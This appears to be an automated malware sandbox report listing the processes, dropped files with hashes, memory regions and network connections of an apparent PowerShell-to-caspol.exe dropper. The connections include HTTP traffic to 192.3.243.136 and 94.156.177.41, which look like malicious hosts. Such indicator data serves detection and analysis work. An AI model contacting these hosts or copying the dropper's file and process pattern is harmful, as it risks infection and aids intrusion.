"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| US | 8.8.8.8:53 | 136.243.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 41.177.156.94.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
memory/4064-0-0x000000007070E000-0x000000007070F000-memory.dmp
memory/4064-1-0x0000000004520000-0x0000000004556000-memory.dmp
memory/4064-2-0x0000000004D20000-0x0000000005348000-memory.dmp
memory/4064-3-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/4064-4-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/4064-5-0x0000000004C40000-0x0000000004C62000-memory.dmp
memory/4064-6-0x0000000005440000-0x00000000054A6000-memory.dmp
memory/4064-7-0x00000000054B0000-0x0000000005516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pcurmcxv.of4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4064-17-0x0000000005520000-0x0000000005874000-memory.dmp
memory/4064-18-0x0000000005B00000-0x0000000005B1E000-memory.dmp
memory/4064-19-0x0000000005B30000-0x0000000005B7C000-memory.dmp
memory/4672-29-0x0000000006EF0000-0x0000000006F22000-memory.dmp
memory/4672-30-0x000000006CFC0000-0x000000006D00C000-memory.dmp
memory/4672-40-0x0000000006300000-0x000000000631E000-memory.dmp
memory/4672-41-0x0000000006F30000-0x0000000006FD3000-memory.dmp
memory/4672-42-0x00000000076B0000-0x0000000007D2A000-memory.dmp
memory/4672-43-0x0000000007060000-0x000000000707A000-memory.dmp
memory/4672-44-0x00000000070C0000-0x00000000070CA000-memory.dmp
memory/4672-45-0x00000000072F0000-0x0000000007386000-memory.dmp
memory/4672-46-0x0000000007260000-0x0000000007271000-memory.dmp
memory/4672-47-0x0000000007290000-0x000000000729E000-memory.dmp
memory/4672-48-0x00000000072A0000-0x00000000072B4000-memory.dmp
memory/4672-49-0x00000000073B0000-0x00000000073CA000-memory.dmp
memory/4672-50-0x00000000072E0000-0x00000000072E8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.cmdline
| MD5 | 8c9b7ff1a72ad5387d3f27fe085a93a7 |
| SHA1 | 593b1e1dd89eebe43407175401d80f1ba30537a1 |
| SHA256 | b778e917038d306ed064959f34d972da79c849d3057db4f8094fb6092fc51b10 |
| SHA512 | 53185cca2dadc75985423cb568d996489860531ab0acf3b90a607cb0874ba59e0928402a062ad239f7362a7481a578ffa4032463bfc5078544f649e13d73b4bd |
\??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\CSC8265DFDF4E4A4F1DACE6C6829FB3C9F8.TMP
| MD5 | 091690bba9ad6c5821e3a1bee115630f |
| SHA1 | d400de84e80751b7e40760030efdd9ee67b3b60e |
| SHA256 | 81f8f0222fdb5722451c7796f1af8b306bda81d7bd796edc15a85968fad7cada |
| SHA512 | e5499895904c43bfb9bfa80a93a751d806704b099667f1dd6d9f8c16398d77425006d30c150952fb4e16f2d81071080fc1d6782e02b64481ebdb3e0179b402eb |
C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp
| MD5 | 6c778c10cd9806dc88b5a362b7dbaf08 |
| SHA1 | b75e7b22df0c281abc3a3446fb2e47c74c2e9234 |
| SHA256 | 181fe92b953876aca806f6e46991beb6251c8341032a02809a320814172fc72e |
| SHA512 | 35e89ea42b155a693ff27a59c7b5a6cb4dd2f6617ff8de740e41cc8866acff2e9aa7fb4f8f4a56df09808405b3919c221a474d91641018cb95c6d7a8974ae239 |
C:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.dll
| MD5 | 9579c39867cc3a948b9672f2f299ec7e |
| SHA1 | b2ac3e3905fa66377ad8dcf752a689514d1074f2 |
| SHA256 | 1faa2da995ad3858c5318c519b9ef1bcc29487cbbf82e13e6d119d3f2ae0f726 |
| SHA512 | 3498aa35dd1c8d7ea6a52c26183f6c992ab63e6d24b9eeaaf2d59e90aa04e3bf30d999252e745b4eba1b713412edce63da4503b68e7139d4ea30a14ec5d2c8a8 |
memory/4064-65-0x00000000060C0000-0x00000000060C8000-memory.dmp
memory/4064-67-0x000000007070E000-0x000000007070F000-memory.dmp
memory/4064-72-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/4064-73-0x0000000070700000-0x0000000070EB0000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRShelL.EXe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 85c8839aeeb7ec3d26c6eda556b54b41 |
| SHA1 | a6fd28cdf822b5886909e3159f03826b39573b22 |
| SHA256 | 39ccaad6c32ae17c090e33b8f04f4d931d868184b5db284208e0d7def0b14702 |
| SHA512 | da91140869e6d7ebf07e7b7c58188b279105397d5ff6f715d5a2986edc5754024bf154e989194b41e4bdf2c2deb77e4c001ea869c9b10fc9a83c5e96f706a68b |
memory/1736-82-0x0000000000AC0000-0x0000000000B58000-memory.dmp
memory/4064-83-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/1736-84-0x0000000005930000-0x0000000005ED4000-memory.dmp
memory/1736-85-0x0000000005420000-0x00000000054B2000-memory.dmp
memory/1736-86-0x00000000055B0000-0x00000000055BA000-memory.dmp
memory/1736-87-0x00000000056C0000-0x000000000575C000-memory.dmp
memory/1736-88-0x0000000005690000-0x00000000056A2000-memory.dmp
memory/1736-89-0x0000000006D90000-0x0000000006DF4000-memory.dmp
memory/320-94-0x0000000005D80000-0x00000000060D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4E79.tmp
| MD5 | 53a4d49bd03963beb41dfb68ac4dc24e |
| SHA1 | 80b6acff7c57e0a48d4751516ccedb5fd831f922 |
| SHA256 | 2c9eb72413dd90a7a15d0275ca8930e76fede3a8d3340ba834bd7571b862aa48 |
| SHA512 | 9d1a16e3cabc2cd51745b78fa7899c695c0c88b3254a9cdc0985efe3da21f86c6d480636bbd0071f850c3162786f5e65a01b68d4398629c3ce4c425cf2eeef05 |
memory/2744-120-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2744-116-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/320-122-0x0000000006970000-0x00000000069BC000-memory.dmp
memory/320-123-0x000000006D5A0000-0x000000006D5EC000-memory.dmp
memory/320-133-0x00000000075F0000-0x0000000007693000-memory.dmp
memory/1532-137-0x000000006D5A0000-0x000000006D5EC000-memory.dmp
memory/320-147-0x0000000007950000-0x0000000007961000-memory.dmp
memory/320-157-0x0000000007990000-0x00000000079A4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | edc4145054dc88b6cd901d5e677eb7a4 |
| SHA1 | f3d163b1f7a6c3960320b549c9bd62f1cd283f54 |
| SHA256 | 5a8fa8f8f4b330ca08e906e7e501af32d4f2125c8f93a1509e710d0be0bfbcb9 |
| SHA512 | 3525dc70ada2e5b9ad2b5af60a06cac4c32d08f457cd304a6f585e99912936a501bd4dcc4179b8fa3a2a8da61ab3f7a82153aa055bf2832d89a89b4d0fbad314 |
memory/2744-167-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2744-175-0x0000000000400000-0x00000000004A2000-memory.dmp